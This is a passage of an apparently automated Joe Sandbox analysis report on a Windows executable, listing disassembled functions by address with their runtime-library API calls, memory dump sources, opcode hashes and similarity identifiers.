                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a0ce5ceb811becd3575f3279940729fd1f4a5eb1517bde019358c09c7aedf686
                                                                                                                                                                                                                                                                                                  • Instruction ID: 02f5c4e8ddadd61845bfd98725ec9ea8e77e8a16f13c396d359f92b316fe882c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0ce5ceb811becd3575f3279940729fd1f4a5eb1517bde019358c09c7aedf686
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB217432604205AF9B22AF66F881E6BB7ADFF44364751852AF919DB751DB30FC008B90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003CFCAB Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 56b4eed9252a4bcf05e95d32230be2758660195cc63a3e4646fa19524021d95f
                                                                                                                                                                                                                                                                                                  • Instruction ID: b0aa5254f0ceb3d7959271bcf7a5ac7cae24af55efeb9ca9a941dd9b478027c2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56b4eed9252a4bcf05e95d32230be2758660195cc63a3e4646fa19524021d95f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1221AE31600205AF9B22AF71DC85F6AB7AEAF14364711893DF916DB150DB30EC4087A0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D9E24 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 003D9E2C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D8A72: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,003D8584,?,00000000,-00000008), ref: 003D8B1E
                                                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003D9E64
                                                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003D9E84
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 158306478-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac1775cf9910beb9aebf5581282f0c87df417b92936a96c8421706e6b0a4da0e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 55e3530ade8db02025b89678d653705c3ec305f97fcf023fb56dd16905211f0f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac1775cf9910beb9aebf5581282f0c87df417b92936a96c8421706e6b0a4da0e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1611D6B39051157EAB2367B27CCDD6F6B5CDE99394710061BF901D9341FE24DD0192B4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00408219 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                  • Instruction ID: 67d6a3cfc06e72462103c25b7d3673c2bc7fc35104cf9b579cc5715185c7df10
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9611837200054DBBCF126F94CD01CEE3F32BB19354B19846AFE9869171C73AD9B1AB85
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00408BA0 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00408BAC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __getptd_noexit.LIBCMT ref: 00409507
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __amsg_exit.LIBCMT ref: 00409514
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00408BCC
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00408BDC
                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00408C0C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3170801528-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e3f35346d8d581433e471c3236182f746457a13e24edf07994db08aa2824a9d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f5923079dd8baf13587b86edfa3b4effb707b367368d6ae86791d89d6541e87
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e3f35346d8d581433e471c3236182f746457a13e24edf07994db08aa2824a9d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88017031A01621ABEA21AB669A0575A73B0AF40724F54403FF840B72D1DF3C6D82CBED
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003E051F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000), ref: 003E0536
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000,00000000,00000000,?,003D767C,00000000), ref: 003E0542
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003E0508: CloseHandle.KERNEL32(FFFFFFFE,003E0552,?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000,00000000,00000000), ref: 003E0518
                                                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 003E0552
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003E04CA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003E04F9,003DF319,00000000,?,003D70F5,00000000,00000000,00000000,00000000), ref: 003E04DD
                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,003DF32C,00000000,00000001,00000000,00000000,?,003D70F5,00000000,00000000,00000000,00000000), ref: 003E0567
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 56413c50e230edd0d143f35b932759f1fe5404ad162a01577134a4310d15e993
                                                                                                                                                                                                                                                                                                  • Instruction ID: bd1340df9ce78fa60afeba303550ef0eaa1723b3b671f53a14be5d9dcce8ccbe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56413c50e230edd0d143f35b932759f1fe5404ad162a01577134a4310d15e993
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02F037368011E9BBCF331F96EC4499D3F69FB09361F024210FA19991F0D67188A09F90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C97DD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 003C9802
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2749dab8a094b746a3c8d5830ebff91bd4f3473e0db77ee7f4c655d696bf6c8c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 76b93614b3924fe4551845d517588b3c26f71a6f48b24dd4ceff04d8d4b36920
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2749dab8a094b746a3c8d5830ebff91bd4f3473e0db77ee7f4c655d696bf6c8c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5415772900209AFCF16DF98CC85FAEBBB5BF49300F1640AAF914AB251D3359D50DB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003FD470 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 003FD4FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407426: std::exception::_Copy_str.LIBCMT ref: 00407441
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 003FD514
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003FD390: std::exception::exception.LIBCMT ref: 003FD3BF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003FD390: __CxxThrowException@8.LIBCMT ref: 003FD3D4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_
                                                                                                                                                                                                                                                                                                  • String ID: LpB
                                                                                                                                                                                                                                                                                                  • API String ID: 758583290-825029884
                                                                                                                                                                                                                                                                                                  • Opcode ID: 57c4579a5890c425686cd50170c1af0b7d99fda424955e6261b8de2e866cadb7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16b95c38580a7845e5d69018f6f36455f53e736bb76eff1b0fc8a649951fbcfe
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57c4579a5890c425686cd50170c1af0b7d99fda424955e6261b8de2e866cadb7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C31E671D00209ABCB15DF69C4857BDBBB5FB05360F14422AF92A97781D734A940CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C5CBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003C6503
                                                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 003C65EB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                                                  • String ID: @-B
                                                                                                                                                                                                                                                                                                  • API String ID: 3761405300-925052545
                                                                                                                                                                                                                                                                                                  • Opcode ID: 38850162e596564fdf980139bd1791f7cdc1a0fcaa765bb170ae37f003987918
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe93f193a707d0c5f873f77ba62d14ef6da653402016c47e1873886a10226072
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38850162e596564fdf980139bd1791f7cdc1a0fcaa765bb170ae37f003987918
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 152112B5620200ABD739CF15FE82B507BA4BB08301F92513AE509CB3B0E3F45982EB0D
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C65FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003C6609
                                                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 003C66C6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                                                  • String ID: @-B
                                                                                                                                                                                                                                                                                                  • API String ID: 3761405300-925052545
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f6b24cdb6a92fbdab721cdfd1daf75a38955f293bb4ddfa03eefe381b138411
                                                                                                                                                                                                                                                                                                  • Instruction ID: 399e7b32a5ccd8f040e4cb81a22f70d77a5cff87baa0ffcb08882700a5847f36
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f6b24cdb6a92fbdab721cdfd1daf75a38955f293bb4ddfa03eefe381b138411
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B11DFB5B20604ABC725DF15FE816407BA4BB08341B82513AE8098B3B0E7F09993EF4D
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C15DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C15E6
                                                                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003C161E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C42D8: _Yarn.LIBCPMT ref: 003C42F7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C42D8: _Yarn.LIBCPMT ref: 003C431B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                                                                                  • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                                                                                  • Opcode ID: 953222e1584cafdbef34c0849772685c7799ba2a58708774016e061935f8de5e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 020e0371c62f9654e529920678eb81890c42110e5b2016735d8d6dc8d6e67560
